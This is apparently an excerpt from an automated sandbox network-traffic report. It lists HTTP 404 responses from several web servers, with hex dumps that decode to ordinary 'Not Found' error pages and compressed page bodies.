78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1238date: Fri, 10 Jan 2025 20:47:57 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 20:48:02 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 20:48:05 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 20:48:08 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 20:48:10 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 20:48:16 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cce1df-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 20:48:19 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cce1df-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 